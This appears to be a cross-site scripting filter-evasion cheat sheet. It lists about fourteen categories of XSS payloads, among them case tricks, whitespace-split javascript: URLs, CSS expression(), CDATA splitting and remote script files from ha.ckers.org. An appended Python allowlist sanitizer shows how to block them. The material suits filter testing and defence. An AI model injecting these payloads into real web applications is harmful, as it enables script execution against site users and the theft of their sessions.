1. Change character case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace .js with another extension

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}

5. Insert extra characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a new line to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> new line
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event handler attributes)

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code contained in a swf file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and then reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
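The common thread in items 1, 2, 5, 6, 9 and 14 above is that a filter matching the raw text with a regular expression sees something different from what the browser parses: tag names are case-insensitive, attribute values are entity-decoded, and tab or newline characters inside a URL are discarded before the scheme is read. The defender-side counterpart, added here as an example that is not part of the original post, is to parse the markup, compare names and values in their canonical form, and allowlist tags, attributes and URL schemes instead of blacklisting patterns. It uses only the Python standard library; the allowlist policy and the sample inputs are constructed for the example, not taken from the page.

```python
import re
from html import escape, unescape
from html.parser import HTMLParser

# Hypothetical allowlist policy for a user-supplied markup field (an assumption
# made for this example, not something the page prescribes). Anything not listed
# is dropped rather than pattern-matched.
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "br", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}

# Browsers remove ASCII tab/newline anywhere inside a URL and trim leading and
# trailing C0 controls and spaces, which is why "jav<TAB>ascript:" still runs.
# Stripping every C0 control and DEL before checking is the safe-side version.
_CTRL = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def url_is_safe(value: str) -> bool:
    """Allowlist the scheme after normalising the value the way a browser would."""
    normalised = _CTRL.sub("", unescape(value)).lower()
    m = _SCHEME.match(normalised)
    if m is None:
        return True  # no scheme at all: a relative URL
    return m.group(1) in ALLOWED_SCHEMES


class Sanitizer(HTMLParser):
    """Rebuilds the fragment from parsed tokens; no raw input text is copied through."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # human-readable record of every rejection

    def handle_starttag(self, tag, attrs):
        # HTMLParser hands over lower-cased tag and attribute names and
        # entity-decoded attribute values, so <sCript>, ONLOAD= and &#106;avascript:
        # are all compared in canonical form rather than by regex on raw text.
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"tag <{tag}> not allowed")
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.dropped.append(f"<{tag}> event handler {name} removed")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"<{tag}> attribute {name} not allowed")
            elif name in URL_ATTRS and not url_is_safe(value):
                self.dropped.append(f"<{tag}> {name} rejected: scheme not allowed")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is always re-escaped; comments are dropped


def sanitize(fragment: str):
    """Return (clean_html, list_of_rejections)."""
    s = Sanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out), s.dropped


# Constructed inputs modelled on the page's categories (case change, tab or
# newline inside the scheme, event handler, entity-encoded scheme) plus one
# benign fragment that must survive unchanged.
SAMPLES = {
    "mixed-case tag": "<sCript>alert(1)</scRipT>",
    "tab in scheme": '<img src="jav\tascript:alert(1)">',
    "newline in scheme": '<img src="jav\nascr\nipt:alert(1)">',
    "event handler": '<body onload="alert(1)">',
    "entity-encoded scheme": '<a href="&#106;avascript:alert(1)">x</a>',
    "benign": '<p>hello <a href="https://example.org/">link</a></p>',
}


def run_samples():
    return {name: sanitize(frag) for name, frag in SAMPLES.items()}


if __name__ == "__main__":
    for name, (clean, dropped) in run_samples().items():
        print(f"{name:22} -> {clean!r}  {dropped}")
```

The point of `dropped` is operational: a sanitizer that silently rewrites input gives the operations team nothing to alert on, whereas a rejection log ("<img> src rejected: scheme not allowed") is a usable detection signal for probing. The legacy IE vectors in items 7, 8, 11 and 12 (CSS `expression()`, XML data islands, HTML+TIME) are not reached by the URL check at all; they are blocked here only because `style`, `xml`, `span` and the `t:` elements are absent from the allowlist, which is the argument for allowlisting over blacklisting.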